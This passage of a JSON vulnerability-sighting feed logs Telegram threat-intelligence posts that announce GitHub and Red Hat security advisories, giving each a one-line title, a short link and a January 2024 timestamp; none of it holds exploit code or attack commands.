"GHSA-GG7W-PW2R-X2CQ", "type": "seen", "source": "https://t.me/ctinow/169011", "content": "https://ift.tt/QNwKef7\n[GHSA-gg7w-pw2r-x2cq] Apache Solr allows read access to host environmet variables", "creation_timestamp": "2024-01-16T21:46:40.000000Z"}, {"uuid": "3c7ad0a1-e756-4ca4-9f83-25f341ee545f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JC7H-C423-MPJC", "type": "seen", "source": "https://t.me/ctinow/169010", "content": "https://ift.tt/riZnuQh\n[GHSA-jc7h-c423-mpjc] Apache Shiro vulnerable to path traversal", "creation_timestamp": "2024-01-16T21:46:37.000000Z"}, {"uuid": "2473aa95-72f9-4093-9edf-a2908cc2975a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0250", "type": "seen", "source": "https://t.me/ctinow/169324", "content": "https://ift.tt/HFSVOn0\nRHSA-2024:0250: Important: OpenJDK 21.0.2 security update", "creation_timestamp": "2024-01-17T16:16:52.000000Z"}, {"uuid": "dafc68a9-4db2-4081-8350-d4b33103d220", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0252", "type": "seen", "source": "https://t.me/ctinow/168459", "content": "https://ift.tt/Hdntyi2\nRHSA-2024:0252: Moderate: krb5 security update", "creation_timestamp": "2024-01-15T17:21:16.000000Z"}, {"uuid": "80b82d89-f30f-463c-914d-073adb9c4656", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0256", "type": "seen", "source": "https://t.me/ctinow/168455", "content": "https://ift.tt/XK3LO1I\nRHSA-2024:0256: Moderate: python3 security update", "creation_timestamp": "2024-01-15T17:21:05.000000Z"}, {"uuid": "0355f823-0381-4123-a04d-17a93b941483", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0078", "type": "seen", "source": "https://t.me/ctinow/168419", "content": "https://ift.tt/iGCSOEb\nCVE-2019-11281 | Pivotal RabbitMQ up to 3.7.17 Host Limits Page/Federation Management UI cross site scripting (RHSA-2020:0078)", "creation_timestamp": "2024-01-15T15:41:36.000000Z"}, {"uuid": "7837ec0a-c0df-4353-914f-88a1f00e17d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0418", "type": "seen", "source": "https://t.me/ctinow/172966", "content": "https://ift.tt/3Ma6mlW\nRHSA-2024:0418: Moderate: avahi security update", "creation_timestamp": "2024-01-24T18:16:29.000000Z"}, {"uuid": "7b5d9403-9861-41ce-8ea6-65b25f9aa9f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0420", "type": "seen", "source": "https://t.me/ctinow/172965", "content": "https://ift.tt/7znqAWm\nRHSA-2024:0420: Moderate: freetype security update", "creation_timestamp": "2024-01-24T18:16:29.000000Z"}, {"uuid": "c736ebf4-e981-4970-8bc9-33eb7794d495", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0421", "type": "seen", "source": "https://t.me/ctinow/172964", "content": "https://ift.tt/CkEJMw0\nRHSA-2024:0421: Moderate: expat security update", "creation_timestamp": "2024-01-24T18:16:27.000000Z"}, {"uuid": "a32cafa5-b5f5-4777-8672-9efd8bfb0917", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0452", "type": "seen", "source": "https://t.me/ctinow/172963", "content": "https://ift.tt/nk5Iy9a\nRHSA-2024:0452: Moderate: curl security update", "creation_timestamp": "2024-01-24T18:16:26.000000Z"}, {"uuid": "9dc56caa-18a8-4da4-87fe-67f6e67f9ddb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0454", "type": "seen", "source": "https://t.me/ctinow/172962", "content": "https://ift.tt/IkaXx5Q\nRHSA-2024:0454: Moderate: python3.9 security update", "creation_timestamp": "2024-01-24T18:16:25.000000Z"}, {"uuid": "1daef0f1-5743-47ca-b16f-948657561294", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0403", "type": "seen", "source": "https://t.me/ctinow/172891", "content": "https://ift.tt/G8xvBKt\nRHSA-2024:0403: Important: kernel security update", "creation_timestamp": "2024-01-24T16:21:37.000000Z"}, {"uuid": "57550b38-bd6d-4123-b99d-378a45ce1bd5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0514", "type": "seen", "source": "https://t.me/ctinow/169180", "content": "https://ift.tt/T2Bj4tJ\nCVE-2019-18197 | libxslt 1.1.33 transform.c xsltCopyText Variable use after free (RHSA-2020:0514)", "creation_timestamp": "2024-01-17T09:41:53.000000Z"}, {"uuid": "e5049ceb-331c-4f01-88c3-6f9484ebb63c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6698-MHXX-R84G", "type": "seen", "source": "https://t.me/ctinow/169020", "content": "https://ift.tt/haRyFIX\n[GHSA-6698-mhxx-r84g] Ursa CL-Signatures Revocation allows verifiers to generate unique identifiers for holders", "creation_timestamp": "2024-01-16T22:26:54.000000Z"}, {"uuid": "4af1a774-d8eb-4778-b218-387ac7086141", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R78F-4Q2Q-HVV4", "type": "seen", "source": "https://t.me/ctinow/169019", "content": "https://ift.tt/Bg7nr9i\n[GHSA-r78f-4q2q-hvv4] CL-Signatures Revocation Scheme in Ursa has flaws that allow a holder to demonstrate non-revocation of a revoked credential", "creation_timestamp": "2024-01-16T22:26:53.000000Z"}, {"uuid": "59980b44-b970-4ad1-a5e9-3be1f2f2a0ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XGFM-FJX6-62MJ", "type": "seen", "source": "https://t.me/ctinow/169014", "content": "https://ift.tt/KfiStoD\n[GHSA-xgfm-fjx6-62mj] readthedocs-sphinx-search vulnerable to cross-site scripting when including search results from malicious projects", "creation_timestamp": "2024-01-16T21:52:03.000000Z"}, {"uuid": "e15b2f79-8fc9-4fab-857c-33849f8db2b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8J98-CJFR-QX3H", "type": "seen", "source": "https://t.me/ctinow/158808", "content": "https://ift.tt/Nkqm7l1\nCVE-2023-49292 | ecies go 2.0.8 Encapsulate/Decapsulate/ECDH information disclosure (GHSA-8j98-cjfr-qx3h)", "creation_timestamp": "2023-12-23T13:11:28.000000Z"}, {"uuid": "ffba54d2-7c35-4a48-ab29-fe56d61b3de7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XXC6-35R7-796W", "type": "seen", "source": "https://t.me/ctinow/161830", "content": "https://ift.tt/SwpvN51\nCVE-2023-38694 | Umbraco CMS up to 8.18.9/10.6.x/12.0.x cross site scripting (GHSA-xxc6-35r7-796w)", "creation_timestamp": "2024-01-02T15:36:19.000000Z"}, {"uuid": "758fbe79-aa24-4c66-9d60-06128da92a82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2X7R-93WW-CXRQ", "type": "seen", "source": "https://t.me/ctinow/161829", "content": "https://ift.tt/EqWhdLB\n[GHSA-2x7r-93ww-cxrq] Winter CMS Local File Inclusion through Server Side Template Injection", "creation_timestamp": "2024-01-02T15:26:47.000000Z"}, {"uuid": "67856e33-53ba-488b-b383-840d5d864788", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8QW9-GF7W-42X5", "type": "seen", "source": "https://t.me/ctinow/167429", "content": "https://ift.tt/pWNHzks\n[GHSA-8qw9-gf7w-42x5] Minor fix to previous patch for CVE-2022-35918", "creation_timestamp": "2024-01-12T18:46:48.000000Z"}, {"uuid": "195cbfc8-1b4e-427f-9900-c06fe5e55d4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0144", "type": "seen", "source": "https://t.me/ctinow/165794", "content": "https://ift.tt/Jk0QU7Z\nRHSA-2024:0144: Moderate: idm:DL1 security update", "creation_timestamp": "2024-01-10T14:16:20.000000Z"}, {"uuid": "aa007eb7-d432-46d8-a6b7-c9e0bb245714", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0143", "type": "seen", "source": "https://t.me/ctinow/165853", "content": "https://ift.tt/phIsJMv\nRHSA-2024:0143: Moderate: idm:DL1 security update", "creation_timestamp": "2024-01-10T15:16:26.000000Z"}, {"uuid": "17a28992-0e2d-4cd7-bd3d-752d28a3b0a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0146", "type": "seen", "source": "https://t.me/ctinow/165852", "content": "https://ift.tt/aR4BmOI\nRHSA-2024:0146: Low: libarchive security update", "creation_timestamp": "2024-01-10T15:16:25.000000Z"}, {"uuid": "8a3286af-e4b8-4ce4-a83d-d0beecc6caad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0148", "type": "seen", "source": "https://t.me/ctinow/165851", "content": "https://ift.tt/agDIrqJ\nRHSA-2024:0148: Important: Red Hat Integration Camel K 1.10.5 release and security update", "creation_timestamp": "2024-01-10T15:16:24.000000Z"}, {"uuid": "95babf53-f295-4879-b0df-0e6c9fa65354", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9759-3276-G2PM", "type": "seen", "source": "https://t.me/ctinow/165848", "content": "https://ift.tt/fEiOAw8\nCVE-2023-50709 | Cube up to 0.34.33 API denial of service (GHSA-9759-3276-g2pm)", "creation_timestamp": "2024-01-10T15:11:50.000000Z"}, {"uuid": "070ea0f3-6f77-48fb-89ad-811349439bcb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0133", "type": "seen", "source": "https://t.me/ctinow/165770", "content": "https://ift.tt/zgj3QvR\nRHSA-2024:0133: Moderate: fence-agents security update", "creation_timestamp": "2024-01-10T13:16:39.000000Z"}, {"uuid": "e879fc80-1c97-4e09-b5f2-306824bdbcdb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0135", "type": "seen", "source": "https://t.me/ctinow/165769", "content": "https://ift.tt/X0oCdr7\nRHSA-2024:0135: Moderate: virt:rhel and virt-devel:rhel security update", "creation_timestamp": "2024-01-10T13:16:37.000000Z"}, {"uuid": "8ab6d6cb-e637-413b-a9cf-eceda80dcc51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-59J7-GHRG-FJ52", "type": "seen", "source": "https://t.me/ctinow/165344", "content": "https://ift.tt/Yw6hUjG\n[GHSA-59j7-ghrg-fj52] Microsoft Security Advisory CVE-2024-21319: .NET Denial of Service Vulnerability", "creation_timestamp": "2024-01-09T20:46:27.000000Z"}, {"uuid": "c0a46f91-b79b-4411-940f-d2936e42d393", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0195", "type": "seen", "source": "https://t.me/ctinow/174847", "content": "https://ift.tt/FRrWpOu\nCVE-2023-6476 | cri-o Experimental Annotation resource consumption (RHSA-2024:0195)", "creation_timestamp": "2024-01-28T07:21:53.000000Z"}, {"uuid": "5ee1b641-bca3-4d07-9074-9824e88ba8e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0804", "type": "seen", "source": "https://t.me/ctinow/175296", "content": "https://ift.tt/oIGBmVq\nCVE-2019-0210 | Apache Thrift up to 0.12.0 TJSONProtocol/TSimpleJSONProtocol out-of-bounds (RHSA-2020:0804)", "creation_timestamp": "2024-01-29T15:11:33.000000Z"}, {"uuid": "946bb30c-db39-46d1-96a3-b0ca50a9371f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0539", "type": "seen", "source": "https://t.me/ctinow/175142", "content": "https://ift.tt/xufcZM1\nRHSA-2024:0539: Important: tomcat security update", "creation_timestamp": "2024-01-29T10:21:26.000000Z"}, {"uuid": "af09f6ce-8fdc-4fa8-9ca5-0ba9826c416b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0532", "type": "seen", "source": "https://t.me/ctinow/175049", "content": "https://ift.tt/R0QWVdh\nRHSA-2024:0532: Important: tomcat security update", "creation_timestamp": "2024-01-29T03:16:44.000000Z"}, {"uuid": "5db39b32-ccf4-438d-a2b6-9b21c9af700d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4JH3-6JHV-2MGP", "type": "seen", "source": "https://t.me/ctinow/174607", "content": "https://ift.tt/KJL76mI\nCVE-2024-21668 | mrousavy react-native-mmkv up to 2.10.x log file (GHSA-4jh3-6jhv-2mgp)", "creation_timestamp": "2024-01-27T04:11:13.000000Z"}, {"uuid": "1c4adf67-6e96-4526-9c2c-97b91cc6d7e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0203", "type": "seen", "source": "https://t.me/ctinow/174731", "content": "https://ift.tt/EqiPLeC\nCVE-2019-18408 | libarchive up to 3.3.x archive_read_support_format_rar.c use after free (RHSA-2020:0203)", "creation_timestamp": "2024-01-27T10:41:40.000000Z"}, {"uuid": "de380125-c504-465b-9dc7-6cff8c49a586", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0538", "type": "seen", "source": "https://t.me/ctinow/175143", "content": "https://ift.tt/apljMBZ\nRHSA-2024:0538: Moderate: libssh security update", "creation_timestamp": "2024-01-29T10:21:28.000000Z"}, {"uuid": "e2de080a-5fcf-44ef-9c36-db96d8dec3e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XR47-PCMX-FQ2M", "type": "seen", "source": "https://t.me/ctinow/174857", "content": "https://ift.tt/lYTbt2X\nCVE-2023-41056 | Redis up to 7.0.14/7.2.3 heap-based overflow (GHSA-xr47-pcmx-fq2m)", "creation_timestamp": "2024-01-28T08:56:16.000000Z"}, {"uuid": "e78927e8-703a-4fb6-a80e-0c7d436580e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HWCC-4CV8-CF3H", "type": "seen", "source": "https://t.me/ctinow/169635", "content": "https://ift.tt/n9xM5la\nCVE-2023-51662 | Snowflake .NET Driver up to 2.1.4 certificate validation (GHSA-hwcc-4cv8-cf3h)", "creation_timestamp": "2024-01-18T09:41:40.000000Z"}, {"uuid": "f91570a8-d959-49a0-8a64-88f75314602a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F899-4MR4-FQPV", "type": "seen", "source": "https://t.me/ctinow/165952", "content": "https://ift.tt/PhF7Hub\n[GHSA-f899-4mr4-fqpv] Apache Answer Race Condition vulnerability", "creation_timestamp": "2024-01-10T17:07:57.000000Z"}, {"uuid": "01d127bf-c6d3-4567-8ff5-4766e13bc186", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CH4W-V7M3-G8WX", "type": "seen", "source": "https://t.me/ctinow/174235", "content": "https://ift.tt/x7p62GT\nCVE-2022-36765 | TianoCore EDK2 up to 202311 CreateHob integer overflow to buffer overflow (GHSA-ch4w-v7m3-g8wx)", "creation_timestamp": "2024-01-26T14:11:07.000000Z"}, {"uuid": "b4a3ffcb-b977-44a9-aed5-5b39ce8ebb49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GR79-9V6V-GC9R", "type": "seen", "source": "https://t.me/ctinow/173970", "content": "https://ift.tt/XeD8AZ2\n[GHSA-gr79-9v6v-gc9r] Dex discarding TLSconfig and always serves deprecated TLS 1.0/1.1 and insecure ciphers", "creation_timestamp": "2024-01-26T03:11:37.000000Z"}, {"uuid": "09db47bb-671f-4b37-a73a-c22ac29735e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-53PH-2R2X-VQW8", "type": "seen", "source": "https://t.me/ctinow/173969", "content": "https://ift.tt/C5lvX07\n[GHSA-53ph-2r2x-vqw8] Cross-site WebSocket hijacking vulnerability in the Jenkins CLI", "creation_timestamp": "2024-01-26T03:11:36.000000Z"}, {"uuid": "e6244762-2aa5-410d-af45-75fb99eec99a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6F9G-CXWR-Q5JR", "type": "seen", "source": "https://t.me/ctinow/173968", "content": "https://ift.tt/W8LhTsZ\n[GHSA-6f9g-cxwr-q5jr] Arbitrary file read vulnerability through the Jenkins CLI can lead to RCE", "creation_timestamp": "2024-01-26T03:11:35.000000Z"}, {"uuid": "716a6104-e190-411c-99e5-4ccd2fefd2ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0254", "type": "seen", "source": "https://t.me/ctinow/168457", "content": "https://ift.tt/owZp1XN\nRHSA-2024:0254: Moderate: rsync security update", "creation_timestamp": "2024-01-15T17:21:11.000000Z"}, {"uuid": "aa95bf38-a62a-493c-9d3b-ee51b4e2ea6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0253", "type": "seen", "source": "https://t.me/ctinow/168458", "content": "https://ift.tt/Mf8Pn5L\nRHSA-2024:0253: Moderate: sqlite security update", "creation_timestamp": "2024-01-15T17:21:14.000000Z"}, {"uuid": "4580db79-7cbb-44e4-bb49-4a02b9d7020c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0187", "type": "seen", "source": "https://t.me/ctinow/168867", "content": "https://ift.tt/5GRldgp\nRHSA-2024:0187: Moderate: Red Hat OpenStack Platform 17.1 (python-urllib3) security update", "creation_timestamp": "2024-01-16T16:16:52.000000Z"}, {"uuid": "1cbf8803-1594-44ff-b685-30e7953ab59b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0188", "type": "seen", "source": "https://t.me/ctinow/168866", "content": "https://ift.tt/AUeDvli\nRHSA-2024:0188: Moderate: Red Hat OpenStack Platform 17.1 (python-eventlet) security update", "creation_timestamp": "2024-01-16T16:16:50.000000Z"}, {"uuid": "0e52a7aa-63d9-4f65-b010-48c07c1f7e35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R64R-5H43-26QV", "type": "seen", "source": "https://t.me/ctinow/173128", "content": "https://ift.tt/RkJ4mO0\n[GHSA-r64r-5h43-26qv] Any authenticated user may obtain private message details from other users on the same instance", "creation_timestamp": "2024-01-24T22:27:17.000000Z"}, {"uuid": "c501e830-df53-4afe-bf53-2624d7f9f84f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MG2X-MGGJ-6955", "type": "seen", "source": "https://t.me/ctinow/173127", "content": "https://ift.tt/3Kp5LbV\n[GHSA-mg2x-mggj-6955] Apache Airflow CNCF Kubernetes provider, Apache Airflow: Kubernetes configuration file saved without encryption in the Metadata and logged as plain text in the Triggerer service", "creation_timestamp": "2024-01-24T22:27:16.000000Z"}, {"uuid": "119b9640-6edc-4da3-a15d-ceef2c13ef45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VM5M-QMRX-FW8W", "type": "seen", "source": "https://t.me/ctinow/173121", "content": "https://ift.tt/K4lxOhE\n[GHSA-vm5m-qmrx-fw8w] Apache Airflow: Bypass permission verification to read code of other dags", "creation_timestamp": "2024-01-24T22:16:48.000000Z"}, {"uuid": "a64292e2-3f56-4370-abff-2e1f213ba375", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0435", "type": "seen", "source": "https://t.me/ctinow/172887", "content": "https://ift.tt/6JqOM2s\nRHSA-2024:0435: Moderate: rpm security update", "creation_timestamp": "2024-01-24T16:21:33.000000Z"}, {"uuid": "21e0d5e8-0af0-4240-8ace-e4eb4b5e687b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0436", "type": "seen", "source": "https://t.me/ctinow/172886", "content": "https://ift.tt/gzceZ7F\nRHSA-2024:0436: Moderate: libcap security update", "creation_timestamp": "2024-01-24T16:21:32.000000Z"}, {"uuid": "1fd4f002-1369-4b44-9ce6-a16fd0d0ed5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0437", "type": "seen", "source": "https://t.me/ctinow/172885", "content": "https://ift.tt/ogcJS1T\nRHSA-2024:0437: Moderate: grub2 security update", "creation_timestamp": "2024-01-24T16:21:30.000000Z"}, {"uuid": "9b6280f2-e4cb-4051-83e6-8e1c0cc5f5cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0386", "type": "seen", "source": "https://t.me/ctinow/172639", "content": "https://ift.tt/XgZRCSp\nRHSA-2024:0386: Important: kpatch-patch security update", "creation_timestamp": "2024-01-24T10:17:00.000000Z"}, {"uuid": "82b474ca-4a34-47a5-841b-4c78e8b65273", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-264P-99WQ-F4J6", "type": "seen", "source": "https://t.me/ctinow/162661", "content": "https://ift.tt/R4xSejK\n[GHSA-264p-99wq-f4j6] Ion Java StackOverflow vulnerability", "creation_timestamp": "2024-01-03T23:22:08.000000Z"}, {"uuid": "ff5afa14-4e15-44bc-ae2b-a684ff9ce737", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-547M-23X7-CXG5", "type": "seen", "source": "https://t.me/ctinow/162598", "content": "https://ift.tt/9npeg0O\n[GHSA-547m-23x7-cxg5] PaddlePaddle null pointer dereference in paddle.nextafter", "creation_timestamp": "2024-01-03T21:22:09.000000Z"}, {"uuid": "d9b5ecd5-9217-471c-a953-6e03faaad3c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VWCH-G97W-HFG2", "type": "seen", "source": "https://t.me/ctinow/162470", "content": "https://ift.tt/aG69g7i\n[GHSA-vwch-g97w-hfg2] CubeFS leaks users key in logs", "creation_timestamp": "2024-01-03T17:26:46.000000Z"}, {"uuid": "494ec1ad-43c4-4ec5-9121-d7e32f22d4ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8H2X-GR2C-C275", "type": "seen", "source": "https://t.me/ctinow/162469", "content": "https://ift.tt/n3xeskQ\n[GHSA-8h2x-gr2c-c275] CubeFS leaks magic secret key when starting Blobstore access service", "creation_timestamp": "2024-01-03T17:26:45.000000Z"}, {"uuid": "0a12e518-1773-43be-877f-078cb121ab70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8R93-59CF-358F", "type": "seen", "source": "https://t.me/ctinow/173151", "content": "https://ift.tt/mDTXy6J\n[GHSA-8r93-59cf-358f] CSRF vulnerability in Jenkins GitLab Branch Source Plugin", "creation_timestamp": "2024-01-24T23:06:42.000000Z"}, {"uuid": "37bf6c75-592e-4806-a186-d95a2b62b43d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QJPF-2JHX-3758", "type": "seen", "source": "https://t.me/ctinow/173149", "content": "https://ift.tt/VZxWJ7B\n[GHSA-qjpf-2jhx-3758] Arbitrary file read vulnerability in Jenkins Log Command Plugin", "creation_timestamp": "2024-01-24T23:06:40.000000Z"}, {"uuid": "d627c299-c6b8-415c-b316-6667d0af0bf8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-738V-V386-8R6G", "type": "seen", "source": "https://t.me/ctinow/167966", "content": "https://ift.tt/OxMgko5\nCVE-2023-51390 | Aiven-Open journalpump up to 2.4.x access control (GHSA-738v-v386-8r6g)", "creation_timestamp": "2024-01-14T08:37:00.000000Z"}, {"uuid": "37cff043-fa7a-462a-b932-2ffcb295d410", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CJGM-9VC9-56MX", "type": "seen", "source": "https://t.me/ctinow/173145", "content": "https://ift.tt/tfVZvbD\n[GHSA-cjgm-9vc9-56mx] Path traversal vulnerability in Jenkins Matrix Project Plugin", "creation_timestamp": "2024-01-24T22:57:36.000000Z"}, {"uuid": "7eb12510-5a36-4782-9b72-af7e312db3e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FW9H-CXX9-GFQ3", "type": "seen", "source": "https://t.me/ctinow/173144", "content": "https://ift.tt/FodSjW8\n[GHSA-fw9h-cxx9-gfq3] Shared projects are unconditionally discovered by Jenkins GitLab Branch Source Plugin", "creation_timestamp": "2024-01-24T22:57:35.000000Z"}, 